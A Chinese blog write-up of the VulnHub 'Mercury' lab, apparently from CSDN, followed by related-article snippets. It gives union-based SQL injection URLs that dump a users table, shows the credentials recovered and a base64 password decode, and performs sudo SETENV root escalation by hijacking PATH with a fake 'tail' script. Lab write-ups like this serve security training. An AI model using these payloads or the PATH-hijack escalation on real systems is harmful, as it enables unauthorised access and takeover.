vulnhub The Planets: Mercury

最新推荐文章于 2024-09-03 19:59:00 发布
最新推荐文章于 2024-09-03 19:59:00 发布
阅读量748 收藏 2
点赞数 3
分类专栏: vulnhub 文章标签: SETENV sudo提权 sql注入 gobuster 404
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/123858800
版权

渗透思路:

nmap扫描 ---- 从404页面获取网站路径 ---- sql注入获取系统用户名和密码 ---- base64解码得到另一个系统用户密码 ---- sudo SETENV提权

环境信息:

靶机:192.168.101.52

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.52

扫描到22端口ssh,以及8080端口,http-proxy,从扫描结果可以看到,状态码404和200的时候,响应报文的内容有显著不同。

2、404页面泄露网站路径

访问http://192.168.101.52:8080,没什么收获,只是说网站还在搭建

访问一个不存在的页面,比如我这次误打误撞根据nikto的扫描结果访问了http://192.168.101.52:8080/SilverStream,触发了404页面,根据该页面的信息,只有三种链接是可以访问的:

  1. http://192.168.101.52:8080
  2. http://192.168.101.52:8080/robots.txt
  3. http://192.168.101.52:8080/mercuryfacts/

第一个链接看过了,没啥营养,dirb扫描也没扫出什么鬼;

第二个如下所示,也没什么营养

访问http://192.168.101.52:8080/mercuryfacts/试试,终于看到点像样的东西了

点击Load a fact,来到http://192.168.101.52:8080/mercuryfacts/1/

注意url,一开始我想到的是既然有1就可能有2,3,4……没准哪个文件中有敏感信息,然后发现果然1~8都有,不过很可惜,都是关于水星的知识,没啥有用的。

点击See list,来到http://192.168.101.52:8080/mercuryfacts/todo

这里面有两个重要信息:

  1. users表有用户认证信息
  2. 网站目前是直接和mysql交互的

3、sql注入获得系统用户名和密码

浏览器地址栏尝试输入发现有sql报错信息,并且非常详细

从下图的sql语句可以知道3件事:

1、sql语句拼接用户输入参数,存在sql注入(虽然已经知道了)。

2、不需要闭合引号。

3、

http://192.168.101.52:8080/mercuryfacts/1/显示的查询结果只有一列

下面开始进行sql注入,目标是获得用户名和密码,没准可以用于ssh登录。

由于已经知道存在users表,因此首先浏览器输入如下payload获得users表的所有列名

http://192.168.101.52:8080/mercuryfacts/1%20union%20select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'%20and%20table_schema=database()/

 从上图可知users表的列有id,password和username。

再在浏览器中输入如下payload得到users表中的所有username和对应的password

http://192.168.101.52:8080/mercuryfacts/1%20union%20select%20group_concat(concat(username,0x7e,password))%20from%20users/

得到几对用户名密码:

john:johnny1987

laura:lovemykids111

sam:lovemybeer111

webmaster:mercuryisthesizeof0.056Earths

进行ssh登录尝试,发现只有webmaster能登录

ssh webmaster@192.168.101.52

webmaster家目录下user_flag.txt中得到一个flag

4、base64解码得到linuxmaster用户密码

进入/home/webmaster/mercury_proj目录,发现有个文件叫notes.txt

查看到其内容如下

看起来像是用户名和密码,除了当前用户webmaster的,还有linuxmaster的。

密码像是base64编码的,解码一下linuxmaster的密码:

echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 --decode

得到linuxmaster的密码为mercurymeandiameteris4880km

尝试用linuxmaster用户进行ssh登录,登录成功

5、sudo SETENV提权

linuxmaster用户shell下输入

sudo -l

并输入密码mercurymeandiameteris4880km,发现其sudo权限是

(root : root) SETENV: /usr/bin/check_syslog.sh

看一下/usr/bin/check_syslog.sh的内容

内容很简单,就是用tail命令看/var/log/syslog的尾部10行。

之前没见过sudoers中配置SETENV的。

网上查了一下,发现sudo运行时默认会启用env_reset选项将命令行设置的环境变量复原,而SETENV会允许用户禁用env_reset选项,允许sudo使用当前用户命令行中设置的环境变量sudo+SETENV(环境变量)提权 - 隐念笎 - 博客园)。

这样一来,就可以自己写个提权的脚本,命名为tail,然后将其所在目录设置在$PATH的最前面,这样使用sudo命令执行/usr/bin/check_syslog.sh的时候,系统调用的tail命令实际上是我自己写的提权脚本。

提权脚本很简单,内容就是/bin/bash

echo "/bin/bash" > tail

然后给它可执行的权限

chmod +x tail

然后设置环境变量,把当前目录(linuxmaster的家目录,也是提权脚本tail所在目录)放在$PATH变量最前面

export PATH=.:$PATH

最后sudo执行/usr/bin/check_syslog.sh

sudo --preserve-env=PATH /usr/bin/check_syslog.sh

立刻提权到root

获得root的flag

题外话:

虽然网站目录扫描对这个靶机没啥意义,但是这次遇到了gobuster的一个之前没遇到过的功能,所以想记录一下。

简单来说,gobuster默认只不显示404的扫描结果,但这次显示了太多的301,其实是无意义的结果,可以用-b把无意义的状态码排除掉,就像下面这样:

​
gobuster dir --url http://192.168.101.52:8080/mercuryfacts/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 404,301

​

仙女象
关注
专栏目录
vm虚拟机搭建Ubuntu三层内网环境,实践内网穿透;仅主机模式,创建虚拟内网。解决虚拟机只有一个网卡的问题;还解决:UP BROADCAST RUNNING MULTICAST
Zero_Adam的博客
07-18 2047
1.初始配置环境 想要搭建一个三层内网环境, 也就需要每一个主机有两张网卡,一个内网,一个外网, 编辑->虚拟网络编辑器,添加两个仅主机模式的虚拟网络 然后编辑虚拟机,添加也给内网网卡,第一层网络的话,一个内网网卡,另一个网卡是外网网卡,能够上网的,同时和我们的win10主机桥接,直接相连。 第二层内网环境:两张网卡,一样的错操作。 然后第三层内网就不说了。 按道理说 编辑好虚拟网络,然后一个主机配上两张网卡,一个网卡连接一个网络,然后就行了啊, 但是,,, 2. 遇到的问题 打开第一层网络的主机
vulnhub吧唧——THE PLANETS: MERCURY
xstlikeja的博客
07-15 194
这里我们sudo -l列出所有可以执行的命令和权限时,发现sudo允许用户以root权限来执行一个shell脚本,并为当前用户配置了SETENV,简直就是瞌睡来了遇到枕头了,这个shell脚本的意思就是利用tail(显示文本末尾行的内容)命令显示/var/log/syslog(系统日志文件)最后十行的内容,作为一个weber,我敏锐的嗅觉告诉我,这个shell脚本一定有问题,果不其然,沉淀之后的我就是不一样,一眼就看出(经过高人指点)这个tail不是绝对路径,所以我们可以在这里做下文章。
vulnhub-Mercury
yutianovo的博客
09-27 594
靶机描述 Difficulty: Easy Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or
Vulnhud-行星系列:Mercury(水星)教学
最新发布
qq_73413340的博客
09-03 1049
靶机使用了arp做目标扫描发现目标地址是192.168.195.131,之后使用nmap对目标地址做了端口扫描发现目标主机开放了22端口、8080端口,站点探测发现没有什么有用的信息然后做了目录爆破但是没有什么收获接着利用报错信息发现一个目录接着在发现的目录中的Load fact链接发现了sql注入漏洞,接着利用sqmap使用脱库发现一个用户密码表并且存在明文,然后使用ssh远程登录了并且在当前文件发现了第一个flag然后在另一个文件夹中发现有一个txt文件,打开发现有两个账户跟密码经过base64解码得出
mercury(--preserver-env提权)
m0_66299232的博客
10-13 765
最关键的一点是.sh文件的执行主要靠syslog的运行 而tail这个命令,他又只显示最后十行,我们又要利用tail,所以软连接vi 用vi来中断执行达到提权目的。5.cat一下这个.sh文件 发现他是用tail ,tail -n 10 /var/log/syslog是显示syslog文件最后十行,2.sudo -l 需要进行输入密码 这是没有sudo权限 然后进行ls -l /home 查看家目录下文件。sudo --preserve-env=PATH /usr/bin/check_syslog.sh
linux提权
2201_75378806的博客
03-27 722
提取的文件要认真看(.log文件之类的可能有账号密码哦)网站。
United Planets: The Last Crusade:二维多方向射击游戏-开源
04-29
“联合星球:最后的十字军东征”是由意大利团队Unreal Project开发的第一款免费开源视频游戏。 《最后的十字军东征》是一款2D多向射击游戏,为这些旧式视频游戏的玩家带来了新的体验。 该团队现在发布游戏的首批版本...
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。
vulnhub靶场 planets
08-28
- *1* *2* [vulnhub靶场——THE PLANETS:EARTH](https://blog.csdn.net/Czheisenberg/article/details/122900121)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
Three-Planets:WebGL 项目
06-21
"Three-Planets: WebGL 项目"是一个基于WebGL技术的互动网页应用,由威廉和一个名为第三组的团队共同开发。WebGL是一种在浏览器中实现的JavaScript API,用于渲染交互式的3D图形,无需任何插件。这个项目可能是为了...
Web 扫描神器:Gobuster 保姆级教程(附链接)
Flag少侠的博客
02-13 4957
Web 扫描神器:Gobuster 保姆级教程(附链接)
PAS安装:某个系统安装在pas6.5上,当访问页面有问题时,报错404页面显示了产品版本信息存在敏感信息泄露。
py_doc的博客
07-25 466
PAS安装:某个系统安装在pas6.5上,当访问页面有问题时,报错404页面显示了产品版本信息存在敏感信息泄露。
rabbitmq集群部署
qq_19520877的博客
05-25 316
1.每台服务器安装rabbitmq (不会的可以百度 有一堆。) 1.1.配置hosts文件内容 集群之间的ip vi /etc/hosts 192.168.101.51 mq 192.168.101.52 wc 2.安装完后开始配置集群 每台集群一定要保证 .erlang.cookie 要一样 这个文件在/var/lib/rabbitmq 目录下 ```csharp cd /var/lib/rabbitmq ls -al cat .erlang.cookie 可以通过scp拷贝到每台服务器
Linux 基础命令 -- sudo
02-16 2363
命令介绍 命令:sudo 系统管理者的身份执行指令 用法: sudo -h | -K | -k | -V usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user] usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [com...
修改404页面,防止暴露环境信息
我本善良的博客
01-13 722
我们在开发中有时会出现404页面,如果是默认的话我们的404错误页面就会显示一些我们的环境信息,为了安全起见,我们可以隐藏起来, 下面是具体步骤:      在Apache配置文件中搜索404,找到这个选项之后修改其后面的页面为自定义页面,比如说nofile.html     然后在站点根目录下面新建一个nofile.html文件,然后去简单编写下页面信息,也可以留白,保存后重启Apache
vulnhub靶场——THE PLANETS: MERCURY
Czheisenberg的博客
02-12 2467
vulnhub靶场——THE PLANETS: MERCURY
linux setenv 用法
weixin_33836223的博客
12-25 333
新装的linux 服务器无法正常输入汉字,显示是正常的 testlfy-/home/mqadmin>\271\244\276\337 \271\244\276\337: Command not found. testlfy-/home/mqadmin>echo $LANG C testlfy-/home/mqadmin>setenv LANG zh_CN test...
Vulnhub靶场实战---DC-8
一期一会的博客
12-13 4719
0x00 环境搭建 1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.https://www.vulnhub.com/entry/dc-8,367/2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.131) 0x01 信息收集 1.找到目标主机 ,拿ar.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值